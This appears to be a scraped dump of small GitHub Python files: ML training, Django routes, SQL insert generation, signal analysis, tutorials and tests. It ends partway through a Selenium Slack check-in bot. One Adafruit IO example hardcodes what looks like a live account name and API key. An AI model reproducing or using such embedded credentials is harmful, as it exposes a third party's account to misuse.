+{"seq_id":"18164626695","text":"import seperate_data\nimport sys,os\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import Callback\nimport numpy as np\n\nclass myCallback(Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('loss')<0.02):\n self.model.stop_training=True\ncallbacks=myCallback()\nseperate_data.seperate_train_data(sys.argv[1])\n#dim1=[]\n#dim2=[]\n#for test_img in os.listdir('train\\\\'+'cat'):\n# img = imread('train\\\\cat\\\\'+test_img)\n# d1,d2,_ = img.shape\n# dim1.append(d1)\n# dim2.append(d2)\n#print(np.mean(dim1))\n#print(np.mean(dim2))\n#Mean image shape is around (356,410,3)\nimage_shape = (356,410,3)\n\nimg_gen = ImageDataGenerator(rescale=1/255)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3,3), input_shape=image_shape, activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ntrain_generator = img_gen.flow_from_directory('train', target_size=(356,410), batch_size=16,color_mode='rgb', class_mode='binary')\nr = model.fit_generator(\n train_generator,\n epochs=15,\n callbacks=[callbacks]\n \n)\n\nplt.plot(r.history['accuracy'])\nplt.show()\n\n\n","repo_name":"utkucolak/Dog-or-Cat-Classifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43638340277","text":"from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom nat_clinic import settings\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.home, name='home'),\n path(\"logout/\", views.logout_user, name='logout'),\n path(\"register/\", views.register_user, name='register'),\n path(\"test/\", views.test, name='test'),\n path(\"record//\", views.record, name='record'),\n path(\"delete_record//\", views.delete_record, name='delete_record'),\n path(\"update_record//\", views.update_record, name='update_record'),\n path(\"add_record/\", views.add_record, name='add_record'),\n\n path(\"tasks/\", views.tasks, name='tasks'),\n path(\"task//\", views.task, name='task'),\n path(\"add_task/\", views.add_task, name='add_task'),\n path(\"update_task//\", views.update_task, name='update_task'),\n path(\"delete_task//\", views.delete_task, name='delete_task'),\n path('task_search/', views.task_search, name='task_search'),\n\n path(\"clients/\", views.clients, name='clients'),\n path(\"client//\", views.client, name='client'),\n path(\"add_client/\", views.add_client, name='add_client'),\n path(\"update_client//\", views.update_client, name='update_client'),\n path(\"delete_client//\", views.delete_client, name='delete_client'),\n path('client_search/', views.client_search, name='client_search'),\n\n path(\"test_template/\", views.test_template, name='test_template'),\n\n path(\"divisions/\", views.divisions, name='divisions'),\n path(\"staffs/\", views.staffs, name='staffs'),\n path(\"staff//\", views.staff, name='staff'),\n path(\"add_staff/\", views.add_staff, name='add_staff'),\n path(\"staff_search/\", views.staff_search, name='staff_search'),\n\n path(\"services/\", views.services, name='services'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"rt-fan/djcrm","sub_path":"nat_clinic/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17727041801","text":"import pandas as pd\nimport google_drive as gd\n\n\ndef get_data_from_tic(df):\n \"\"\"\n Parses Table Instance Charts (TIC) from the DataFrame and returns list\n of columns and data values.\n :param df: DataFrame corresponding to the TIC.\n :return: tuple - list of columns of the table, list of list of records.\n \"\"\"\n target_row_id = \"Sample Row 1\"\n dfc = df.copy(deep=True)\n dfc.set_index(dfc.columns[0], inplace=True)\n i = dfc.index.to_list().index(target_row_id)\n sub = dfc[i:].to_dict(orient=\"records\")\n col_list = sub[0].keys()\n values = list()\n for r in sub:\n values.append(\n [v for v in map(\n lambda s: f\"'{s}'\" if not str.isnumeric(s) else s,\n r.values()\n )]\n )\n return col_list, values\n\n\ndef dfs_to_insert_stmt(df_dict):\n \"\"\"\n Parses the dict of DataFrames and returns Insert statements for each table.\n :param df_dict: dict - of DataFrames of TICs.\n :return: dict - key : table-name\n value: list of insert statements from each TIC DataFrame.\n \"\"\"\n insert_statements = dict()\n for table_name, dataframe in df_dict.items():\n col_list, rows = get_data_from_tic(dataframe)\n stmt_list = list()\n stmt = f\"INSERT INTO {table_name} ({','.join(col_list)}) VALUES\"\n for row in rows:\n _string = ','.join(row)\n _insert = f\"{stmt} ({_string});\"\n stmt_list.append(_insert)\n insert_statements[table_name] = stmt_list\n return insert_statements\n\n\ndef get_table_instance_charts():\n \"\"\"\n Returns all Table Instance Charts from Excel/Spreadsheet files with name\n like \"table instance\" (saved in Google Drive).\n :return: dict - key : file-name,\n value: dict (key: Table Name, value: DataFrame of TIC)\n \"\"\"\n drive = gd.GoogleDriveAPI()\n file_subset = \"table instance\"\n sheets = drive.get_unique_spreadsheets_list()\n sheets_df = pd.DataFrame(sheets)\n _condition = sheets_df.name.str.lower().str.contains(file_subset)\n target_files = sheets_df[_condition]\n files = dict()\n for file in target_files.to_dict(orient=\"records\"):\n _id, _name = file.get(\"id\"), file.get(\"name\")\n files[_name] = drive.sheet_to_df_dict(_id)\n return files\n","repo_name":"nsp8/GoogleDriveSheetsUtilities","sub_path":"database_util.py","file_name":"database_util.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42086995752","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nqueue = deque()\nn = int(input())\n\nfor _ in range(n):\n x = input().split()\n if x[0] == \"push\":\n queue.append(x[1])\n elif x[0] == \"pop\":\n print(queue.popleft() if queue else -1)\n elif x[0] == \"size\":\n print(len(queue))\n elif x[0] == \"empty\":\n print(1 if len(queue)==0 else 0)\n elif x[0] == \"front\":\n print(queue[0] if queue else -1)\n elif x[0] == \"back\":\n print(queue[-1] if queue else -1)\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution527.py","file_name":"solution527.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16403429827","text":"\"\"\"Chrome Experience Sampling backend API.\n\nImplemented using Google Cloud Endpoints for App Engine.\n\"\"\"\n\nimport endpoints\nfrom protorpc import message_types\nfrom protorpc import remote\n\nfrom messages import SurveyMessage\nimport models\n\npackage = 'ChromeExperienceSampling'\n\n\n@endpoints.api(name='cesp', version='v1',\n scopes=[endpoints.EMAIL_SCOPE])\nclass ExperienceSamplingApi(remote.Service):\n \"\"\"CESP Backend API v1.\"\"\"\n\n @endpoints.method(SurveyMessage, message_types.VoidMessage,\n path='submitsurvey', http_method='POST',\n name='submitSurvey')\n def survey_submit(self, request):\n survey = models.SurveyModel.fromMessage(request)\n survey.put()\n return message_types.VoidMessage()\n\nAPPLICATION = endpoints.api_server([ExperienceSamplingApi])\n","repo_name":"googlearchive/experience-sampling","sub_path":"backend/survey_backend_api.py","file_name":"survey_backend_api.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"20032672987","text":"import sqlite3\nimport pytest\nfrom models.supplier import Supplier\nfrom services.product_service import ProductService\nfrom services.supplier_service import SupplierService\n\nDB_NAME = \"inventory.db\"\n\n\n@pytest.fixture\ndef test_db_connection():\n connection = sqlite3.connect(DB_NAME)\n yield connection\n\n\ndef test_add_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n supplier = Supplier(\n supplier_id=\"999\",\n supplier_name=\"TestSupplier\",\n contact_person=\"John Doe\",\n contact_number=\"123456789\",\n email=\"test@example.com\",\n )\n\n assert service.add_supplier(supplier) is True\n\n\ndef test_get_supplier_by_id(test_db_connection):\n service = SupplierService(test_db_connection)\n retrieved_supplier = service.get_supplier_by_id(\"1\")\n assert retrieved_supplier is not None\n\n\ndef test_get_all_suppliers(test_db_connection):\n service = SupplierService(test_db_connection)\n\n # Check if all suppliers are retrieved\n all_suppliers = service.get_all_suppliers()\n assert all_suppliers is not None\n assert len(all_suppliers) != 0\n\n\ndef test_update_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n\n # Update the supplier information\n updated_supplier = Supplier(\n supplier_id=\"3\",\n supplier_name=\"UpdatedSupplier\",\n contact_person=\"Updated John\",\n contact_number=\"987654321\",\n email=\"updated@example.com\",\n )\n service.update_supplier(updated_supplier)\n\n # Check if the supplier is updated successfully\n retrieved_supplier = service.get_supplier_by_id(\"3\")\n assert retrieved_supplier is not None\n assert retrieved_supplier.supplier_name == \"UpdatedSupplier\"\n assert retrieved_supplier.contact_person == \"Updated John\"\n assert retrieved_supplier.contact_number == \"987654321\"\n assert retrieved_supplier.email == \"updated@example.com\"\n\n\ndef test_delete_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n service.delete_supplier(\"15\")\n\n # Check if the supplier is deleted successfully\n retrieved_supplier = service.get_supplier_by_id(\"15\")\n assert retrieved_supplier is None\n","repo_name":"zYasser/Inventory-Management-System","sub_path":"test/test_supplier.py","file_name":"test_supplier.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41859198415","text":"import numpy as np\nimport itertools as it\nimport collections\n\n\nclass EMGLogic(object):\n\n def createTimeStepsArray(self, signal):\n dt = float(signal.sampling_period)\n return np.linspace(0.0, float(dt*signal.size - dt), num=signal.size)\n\n def __init__(self, emg_signal, fid=None, trigger_threshold=1.0, window_begin=0.02, window_end=0.10, \\\n paired_pulse=True, pp_interval=0.03):\n self.emg_signal = emg_signal\n self.filename = fid.name\n self.emg_signal_deriv = np.diff(self.emg_signal)\n self.trigger_threshold = trigger_threshold\n self.paired_pulse = paired_pulse\n self.pp_interval = pp_interval\n self.timesteps = self.createTimeStepsArray(emg_signal)\n self.MinMaxTuple = collections.namedtuple('MinMaxTuple', 'minTime minValue maxTime maxValue peak2peak')\n self.updateParameters(window_begin, window_end, trigger_threshold)\n\n def updateParameters(self, begin, end, trigger_threshold):\n self.trigger_dict = dict()\n self.window_begin = begin\n self.window_end = end\n self.trigger_threshold = trigger_threshold\n self.response_window_time = np.array([self.window_begin,self.window_end])\n self.response_window_indices = self.response_window_time*self.emg_signal.sampling_rate\n self.fillTriggerDict()\n\n def fillTriggerDict(self):\n \"\"\" Fill self.trigger_dict by detecting TMS spikes, and map those timepoints \n to their min and max response values.\n \"\"\"\n trigger_indices = self.findTriggerIndices(self.emg_signal_deriv, self.trigger_threshold)\n for index in trigger_indices:\n self.trigger_dict[self.timesteps[index]] = self.findResponseMinMaxs(index)\n\n def findTriggerIndices(self, signal_deriv, threshold):\n \"\"\"Given a signal, return the indices which are less than a certain\n threshold.\n \"\"\"\n trigger_array, = np.ma.nonzero(np.ma.masked_less(signal_deriv, threshold))\n trigger_list = trigger_array.tolist()\n # Trigger waiting period: for paired pulse data there are two triggers within 30ms of eachother.\n # Skip ahead the corresponding number of samples to avoid tagging both triggers. Non-pp data\n # doesn't have close-together triggers so we can do this safely for both.\n if self.paired_pulse:\n trigger_waiting_period = int(self.pp_interval*self.emg_signal.sampling_rate)\n # Quick way to find which triggers are close together\n secondary_triggers_indices, = np.where(abs(np.diff(trigger_list)) < trigger_waiting_period)\n # Delete-by-index must be done in reverse order. Otherwise all the indices shift\n for sec_trigger in sorted(secondary_triggers_indices, reverse=True):\n del trigger_list[sec_trigger+1]\n return trigger_list\n\n def findResponseMinMaxs(self, trigger_index):\n \"\"\"Find the min and max response after a trigger\n at the given index\"\"\"\n window_start_index = trigger_index + int(self.response_window_indices[0])\n window_stop_index = trigger_index + int(self.response_window_indices[1])\n window = self.emg_signal[window_start_index:window_stop_index]\n max_index = np.argmax(window)\n min_index = np.argmin(window)\n window_max = window[max_index]\n window_min = window[min_index]\n final_min_index = window_start_index+min_index\n final_max_index = window_start_index+max_index\n # Prepare return values\n minTime=self.timesteps[final_min_index]\n minValue=self.emg_signal[final_min_index]\n maxTime=self.timesteps[final_max_index]\n maxValue=self.emg_signal[final_max_index]\n peak2peak = abs(maxValue) + abs(minValue)\n triggerTuple = self.MinMaxTuple(minTime=minTime, \\\n minValue=minValue, \\\n maxTime=maxTime, \\\n maxValue=maxValue, \\\n peak2peak=peak2peak)\n return triggerTuple\n\n def addTriggerTimepoint(self, trigger_time):\n new_trigger_index = np.argmin(abs(self.timesteps - trigger_time))\n self.trigger_dict[self.timesteps[new_trigger_index]] = \\\n self.findResponseMinMaxs(new_trigger_index)\n return self.timesteps[new_trigger_index]\n\n def writeInfoToCSV(self, outputPath):\n np.savetxt(outputPath, \\\n np.vstack([\n np.hstack(arr.reshape(-1,1) for arr in \\\n [self.getTriggerTimePoints(), \\\n self.getTriggerMinTimes(), \\\n self.getTriggerMins(), \\\n self.getTriggerMaxTimes(), \\\n self.getTriggerMaxs(), \\\n self.getTriggerMeans(), \\\n self.getTriggerP2Ps()]),\n \\\n np.array([0,0,0,0,0,0,self.getFinalAverage()])]), \\\n header=\"trigger,min_time,min_value,max_time,max_value,mean,peak2peak,finalAverage\", delimiter=\",\", \\\n fmt=\"%.5e\")\n\n def getSignalInfo(self):\n infoStrings = []\n infoStrings.append(\"*\"*80)\n infoStrings.append(\"Info for: {}\".format(self.filename))\n infoStrings.append(\"[trigger time, MEP Amplitude]\")\n infoStrings.append(\"=============================\")\n infoStrings.append(str(np.hstack(arr.reshape(-1,1) for arr in [self.getTriggerTimePoints(), self.getTriggerP2Ps()])))\n infoStrings.append(\"Average MEP Amplitude: {}\".format(self.getFinalAverage()))\n return \"\\n\".join(infoStrings)\n\n def getTriggerTimePoints(self):\n return np.array(sorted(self.trigger_dict))\n\n def getTriggerMins(self):\n return np.array([self.trigger_dict[trigger_time].minValue for trigger_time in sorted(self.trigger_dict)])\n\n def getTriggerMinTimes(self):\n return np.array([self.trigger_dict[trigger_time].minTime for trigger_time in sorted(self.trigger_dict)])\n\n def getTriggerMaxs(self):\n return np.array([self.trigger_dict[trigger_time].maxValue for trigger_time in sorted(self.trigger_dict)])\n\n def getTriggerMaxTimes(self):\n return np.array([self.trigger_dict[trigger_time].maxTime for trigger_time in sorted(self.trigger_dict)])\n\n def getTriggerMeans(self):\n return (self.getTriggerMins() + self.getTriggerMaxs()) / 2\n\n def getTriggerP2Ps(self):\n return abs(self.getTriggerMins()) + abs(self.getTriggerMaxs())\n\n def getFinalAverage(self):\n return np.mean(self.getTriggerP2Ps())","repo_name":"chrismullins/Mavin","sub_path":"emgviewerqt/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19676312547","text":"\"\"\"\nTutorial - Sessions\n\nStoring session data in CherryPy applications is very easy: cherrypy\nprovides a dictionary called \"session\" that represents the session\ndata for the current user. If you use RAM based sessions, you can store\nany kind of object into that dictionary; otherwise, you are limited to\nobjects that can be pickled.\n\"\"\"\n\nimport cherrypy\n\n\nclass HitCounter:\n \n _cp_config = {'tools.sessions.on': True}\n \n def index(self):\n # Increase the silly hit counter\n count = cherrypy.session.get('count', 0) + 1\n \n # Store the new value in the session dictionary\n cherrypy.session['count'] = count\n \n # And display a silly hit count message!\n return '''\n During your current session, you've viewed this\n page %s times! Your life is a patio of fun!\n ''' % count\n index.exposed = True\n\n\ncherrypy.tree.mount(HitCounter())\n\n\nif __name__ == '__main__':\n import os.path\n thisdir = os.path.dirname(__file__)\n cherrypy.quickstart(config=os.path.join(thisdir, 'tutorial.conf'))\n","repo_name":"heynemann/skink","sub_path":"skink/lib/cherrypy/tutorial/tut07_sessions.py","file_name":"tut07_sessions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"37"} +{"seq_id":"26709793676","text":"#!/usr/bin/env python\n\ndef sumsquares(n):\n\tret = 0 \n\tfor i in range(1,n+1):\n\t\tret += i ** 2\n\treturn ret\n\ndef squaressum(n):\n\tsum = 0.5 * n * (n+1) # Use sum of n formula\n\treturn sum ** 2\n\nn = int(squaressum(100) - sumsquares(100))\n\nprint(n)\n","repo_name":"colinbrophy/euler","sub_path":"prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18796074540","text":"import base64\nimport requests\n\nfor i in range(1,6):\n url = 'http://43.138.37.199:12345/jsfuck/api?page=%d' % i\n sign = base64.b64encode(('/jsfuck/api?page=%d' % i).encode('utf-8'))\n sign = sign.decode('utf-8')\n headers = {\n 'user-agent': 'apecome.com',\n 'sign': sign\n }\n resp = requests.get(url, headers=headers).json()\n msg = resp['msg']\n print(msg)\n","repo_name":"konatax/crawler","sub_path":"bikongge/02_jsfuck/02_jsfuck.py","file_name":"02_jsfuck.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72243925866","text":"from dictionary import*\nfrom encryption import*\nfrom decryption import*\n\nclass HancSecurity:\n\n def __init__(self, key = 0, user_input = \"User Message\", crypt_type = \"encrypt\"):\n self.user_input = user_input\n self.key = key\n self.crypt_type = crypt_type\n self.message = \"\"\n self.cipher = \"\"\n def crypting(self):\n try0 = HancSecurity(self.key, self.user_input, self.crypt_type)\n if try0.crypt_type == \"encrypt\":\n output = encrypt(self.key, self.user_input)\n else:\n output = decrypt(self.key, self.user_input)\n return output\n\ndef main():\n key1 = int(input(\"Please enter your key: \"))\n use_mgs1 = input(\"Please enter your text: \")\n crypt1 = input(\"Please enter your encryption_type [encrypt/decrypt]: \")\n try0 = HancSecurity(key1, use_mgs1, crypt1)\n try1 = try0.crypting()\n print(try1)\nif __name__== \"__main__\":\n main()\n","repo_name":"hanchannmakara/csc101_project_hanc","sub_path":"hanc_combined_codes.py","file_name":"hanc_combined_codes.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1415890393","text":"\"\"\"\n'random_data.py'\n================================================\nExample for accessing the Adafruit IO Random\nData Service.\n\nAuthor(s): Brent Rubell for Adafruit Industries\n\"\"\"\n# Import JSON for forecast parsing\nimport json\n# Import Adafruit IO REST client.\nfrom Adafruit_IO import Client, Feed, RequestError\n\n# Set to your Adafruit IO key.\nADAFRUIT_IO_USERNAME = 'brubell'\nADAFRUIT_IO_KEY = '6ec4b31bd2c54a09be911e0c1909b7ab'\n\n# Create an instance of the REST client.\naio = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\ngenerator_id = 1461\n\n# Get the specified randomizer record with its current value and related details.\nrandom_data = aio.receive_random(generator_id)\n# Parse the API response\ndata = json.dumps(random_data)\ndata = json.loads(data)\nprint('Random Data: {0}'.format(data['value']))","repo_name":"adafruit/Adafruit_IO_Python","sub_path":"examples/api/random_data.py","file_name":"random_data.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"37"} +{"seq_id":"13181824028","text":"from joblib import Parallel, delayed\nimport R_Breaker_faster\nimport pandas as pd\nimport time\n\n\ndef run(start: str, end: str):\n all_ = [[5 * i, j] for i in range(1, 7) for j in range(1, 4) if 5 * i != 5 or j != 2]\n return Parallel(n_jobs=-1)(delayed(R_Breaker_faster.run)(start, end, 25, 1, 0.05, 0.01, 10, j, i) for i, j in all_)\n\n\nif __name__ == '__main__':\n start_time = time.time()\n df = pd.concat(run('20210101', '20230217'), ignore_index=True)\n df = df.sort_values('annualized_returns', ascending=False)\n df = df[['n_std', 'n_bias', 'annualized_returns', 'sharpe', 'max_drawdown']]\n df.to_csv('params.csv', index=False)\n print(df)\n print(f\"总共花了{(time.time() - start_time) / 60: .2f}分钟\")\n","repo_name":"Evanzhengyifan/pythonProject","sub_path":"Litehedge/tactics_py/R-Breaker/R_Breaker_faster_parallel.py","file_name":"R_Breaker_faster_parallel.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71598719789","text":"import spotipy\nimport spotipy.util as util\nfrom functions import get_all_api_results, get_tracks_df, \\\n get_artists_df, get_audio_feature_df, get_all_playlist_tracks_df, music_recommendations_df\n\nimport pandas as pd\n#from spotipy.oauth2 import SpotifyOAuth\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\n# client credentials\nid = 'xxxxxxxxxx'\nsecret = 'xxxxxxxxxx'\nuri = 'xxxxxxxxxx'\nuser_name = 'xxxxxxxxxx'\n\n# using scopes\nscope = \"user-library-read user-follow-read user-top-read playlist-read-private\"\n\n# Authorization flow\ntoken = util.prompt_for_user_token(user_name, scope, client_id=id, client_secret=secret, redirect_uri=uri)\n\nif token:\n sp = spotipy.Spotify(auth=token)\nelse:\n print(\"Can't get token for\", user_name)\n\nprint(\"Extracting and transforming the top track data\")\ntop_tracks = get_all_api_results(sp, sp.current_user_top_tracks())\ntop_tracks_df = get_tracks_df(top_tracks)\ntop_tracks_df = get_audio_feature_df(sp, top_tracks_df)\ntop_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/top_tracks.csv\", index=False)\n\n\nprint(\"Extracting and transforming the top artists data\")\ntop_artists = get_all_api_results(sp, sp.current_user_top_artists())\ntop_artists_df = get_artists_df(top_artists)\ntop_artists_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/top_artists.csv\", index=False)\n\n\nprint(\"Extracting and transforming the followed artists data\")\nfollowed_artists = get_all_api_results(sp, sp.current_user_followed_artists())\nfollowed_artists_df = get_artists_df(followed_artists)\nfollowed_artists_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/followed_artists.csv\", index=False)\n\n\nprint(\"Extracting and transforming the followed playlist\")\nfollowed_playlists_tracks = get_all_api_results(sp, sp.current_user_playlists())\nplaylists_df = pd.DataFrame(followed_playlists_tracks)\nplaylist_basic_df = playlists_df[['id','name']].drop_duplicates(ignore_index=True)\nplaylist_basic_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/playlists.csv\", index=False)\n# playlists_ids = playlists_df['id'].tolist() # id list of all playlists\n# playlists_names = playlists_df['name'].tolist()\n\nprint(\"Extracting and transforming the selected playlist track data\")\nselected_playlist = playlists_df[playlists_df['name'].str.contains('Boxing')]['id']\nprint(selected_playlist)\nselected_playlist_tracks_df = get_all_playlist_tracks_df(sp, selected_playlist)\nselected_playlist_tracks_df = get_audio_feature_df(sp, selected_playlist_tracks_df)\nselected_playlist_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/followed_playlists_tracks.csv\", index=False)\n\nprint(\"Extracting and transforming the recommended songs\")\ntrack_rec = music_recommendations_df(sp, selected_playlist_tracks_df, 20)\nrec_tracks_df = get_tracks_df(track_rec).drop_duplicates(ignore_index=True) # remove duplication\nrec_tracks_df = get_audio_feature_df(sp, rec_tracks_df)\nrec_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/recommended_tracks.csv\", index=False)","repo_name":"lawrencelau915/spotify-track-recommendation-optimizer","sub_path":"get_music_data.py","file_name":"get_music_data.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22577281111","text":"import asyncio\nimport discord\nimport logging\n\nfrom discord.ext.cluster import Shard, ClientPayload\nfrom discord.ext import commands\n\nlogging.basicConfig(level=logging.INFO)\n\nlogging.getLogger(\"discord.http\").disabled = True\nlogging.getLogger(\"discord.client\").disabled = True\nlogging.getLogger(\"discord.gateway\").disabled = True\n\nclass MyBot(commands.Bot):\n def __init__(self) -> None:\n intents = discord.Intents.all()\n\n super().__init__(\n command_prefix=\"$.\",\n intents=intents\n )\n\n self.shard = Shard(self, shard_id=1)\n\n async def setup_hook(self) -> None:\n await self.shard.connect()\n\n @Shard.route(shard_id=1)\n async def get_user_data(self, data: ClientPayload):\n user = self.get_user(data.user_id)\n return user._to_minimal_user_json()\n\nif __name__ == '__main__':\n bot = MyBot()\n asyncio.run(bot.run(...))","repo_name":"MiroslavRosenov/better-cluster","sub_path":"examples/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28584664495","text":"from pathlib import Path\n\nimport dj_database_url\n\n# Base directory\nBASE_DIR = Path(__file__).resolve().parent.parent.parent\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': [BASE_DIR / 'db.sqlite3'],\n }\n}\n\n# set up for heroku's db\ndb_from_env = dj_database_url.config()\n\nDATABASES['default'].update(db_from_env)\n\nDATABASES['default']['CONN_MAX_AGE'] = 500\n\n# hosts urls\nALLOWED_HOSTS = [\n 'vitalcen.herokuapp.com',\n '.vitalcen.com',\n]\n\n# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')\nCORS_REPLACE_HTTPS_REFERER = True\nHOST_SCHEME = \"https://\"\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_SECONDS = 1000000\nSECURE_FRAME_DENY = True\nSECURE_HSTS_PRELOAD = True\n","repo_name":"macodd/vitalcen","sub_path":"vitalcen/config/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24893411521","text":"import pytest\nfrom src.Ejercicio_2_1_7 import tipo_de_renta\n\n@pytest.mark.parametrize(\n \"input_n, expected\",\n [\n (9000, \"5\"),\n (12000, \"15\"),\n (22000, \"20\"),\n (36000, \"30\"),\n (70545, \"45\"),\n (37000, \"30\")\n ]\n)\ndef test_tipo_de_renta_params(input_n, expected):\n assert tipo_de_renta(input_n) == expected","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-dbenfon341","sub_path":"tests/Ejercicio_2_1_7_test.py","file_name":"Ejercicio_2_1_7_test.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71564872106","text":"import sys\nimport webbrowser\nfrom time import sleep\n\ndef start():\n with open(sys.argv[1],\"r\") as f:\n while True:\n line = f.readline()\n if line:\n webbrowser.open(line,new=0,autoraise=True)\n sleep(5)\nstart()\n ","repo_name":"dineyw23/OpenWebPages","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70887962668","text":"from config import (\n CHECKIN_TIME,\n SLACK_EMAIL,\n SLACK_PASSWORD,\n COACH,\n GECKODRIVER,\n)\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options as options_c\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\nfrom time import sleep\nfrom os import system, path\nimport datetime\n\nCLEAR = lambda: system(\"clear\")\nPATH = path.realpath(__file__)\nPATH = PATH.replace(\"core/slack_bot.py\", f\"chrome_driver/{GECKODRIVER}\")\nPATH = PATH.replace(\"core\\slack_bot.py\", f\"chrome_driver\\{GECKODRIVER}\")\n\n\nclass Bot:\n def __init__(self):\n # CHROME DRIVER OPTIONS\n chrome_options = options_c()\n chrome_options.add_argument(\"--disable-extensions\")\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_experimental_option(\"excludeSwitches\", [\"enable-logging\"])\n self.driver = webdriver.Chrome(PATH, options=chrome_options)\n\n def write_checkin(self, text1, text2):\n input_to_write = self.driver.find_elements_by_class_name(\"ql-editor, ql-blank\")\n\n input_to_write.reverse()\n\n if text1 != \"\":\n what_im_doing = f\"1. {text1.capitalize()}\"\n problems = text2.capitalize()\n input_to_write[0].send_keys(what_im_doing + Keys.CONTROL + Keys.ENTER)\n input_to_write[0].send_keys(problems)\n input_to_write[0].send_keys(Keys.ENTER)\n\n if text1 == \"\":\n input_to_write[0].send_keys(\"Check-in\")\n input_to_write[0].send_keys(Keys.ENTER)\n\n CLEAR()\n\n def login_slack(self, link):\n\n self.driver.get(link)\n\n sleep(2)\n\n workspace_link = self.driver.find_element_by_xpath('//*[@id=\"domain\"]')\n\n workspace_link.send_keys(\"kenzieacademybrasil\")\n\n workspace_button = self.driver.find_element_by_xpath(\n \"/html/body/main/div/div/div/div/div[2]/form/button\"\n )\n workspace_button.click()\n\n sleep(2)\n\n slack_email = self.driver.find_element_by_xpath('//*[@id=\"email\"]')\n slack_email.send_keys(SLACK_EMAIL)\n 